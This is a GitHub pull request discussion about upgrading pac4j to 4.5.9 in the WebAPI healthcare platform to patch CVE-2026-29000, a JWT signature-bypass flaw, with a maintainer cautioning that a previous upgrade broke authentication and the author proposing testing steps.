fix(security): Upgrade pac4j-jwt to 4.5.9 (CVE-2026-29000)

[abhu85]

Summary

This PR upgrades pac4j from version 4.0.0 to 4.5.9 to address CVE-2026-29000, a critical authentication bypass vulnerability.

Vulnerability Details

Field	Value
CVE	CVE-2026-29000
CVSS Score	9.1 (Critical)
Affected Component	pac4j-jwt JwtAuthenticator
CWE	CWE-347 (Improper Verification of Cryptographic Signature)
Fixed In	pac4j 4.5.9+, 5.7.9+, 6.3.3+

Description

The vulnerability in pac4j-jwt allows remote attackers to forge authentication tokens. An attacker with access to the server's RSA public key can create a JWE-wrapped PlainJWT with arbitrary subject and role claims, bypassing signature verification to authenticate as any user, including administrators.

Impact

Given that WebAPI is a healthcare research platform handling sensitive patient data and cohort definitions, this authentication bypass vulnerability poses a significant risk. Attackers could potentially:

• Access sensitive healthcare data without authorization
• Modify cohort definitions and study parameters
• Impersonate administrators to gain full system control

Changes

• Updated pac4j.version property from 4.0.0 to 4.5.9 in pom.xml
• This affects all pac4j modules (pac4j-oauth, pac4j-oidc, pac4j-http, pac4j-saml-opensamlv3, pac4j-cas) used by WebAPI

Testing

• Dependencies resolve successfully with the new version
• CI builds pass (to be verified)
• Authentication flows work correctly (requires manual testing in staging environment)

References

• CVE-2026-29000 on NVD
• pac4j Security Advisory

[CyloNox]

The last time this was upgraded it broke authentication. So definitely need to be cautious on upgrading this one.

Here is the hotfix that restored it: https://github.com/OHDSI/WebAPI/pull/2454/changes

[abhu85]

Thanks for the heads up @CyloNox - I looked into this.

Good news: buji-pac4j 5.0.1's pom.xml declares compatibility with pac4j [4.0, 5.0), so 4.5.9 should work from a dependency perspective.

The previous breakage with 4.5.5 was likely due to runtime behavioral changes in pac4j, not a hard dependency conflict. Looking at the pac4j 4.x changelog, there were some breaking changes in profile handling and session management between minor versions.

To mitigate risk, I can:

1. Review WebAPI's OAuth/OIDC/CAS filter implementations for any pac4j API usage that changed between 4.0.0 and 4.5.9
2. Add integration tests if there's a test environment available
3. Document any configuration changes needed

Would it help if I:

• Fork and test locally with your authentication setup?
• Create a more gradual upgrade path (e.g., 4.0.0 → 4.2.x → 4.5.9)?
• Add specific testing instructions to the PR for your staging environment?

Given the CVE severity (9.1 CVSS - authentication bypass), I'd like to help find a safe path forward. Let me know what would work best for your team.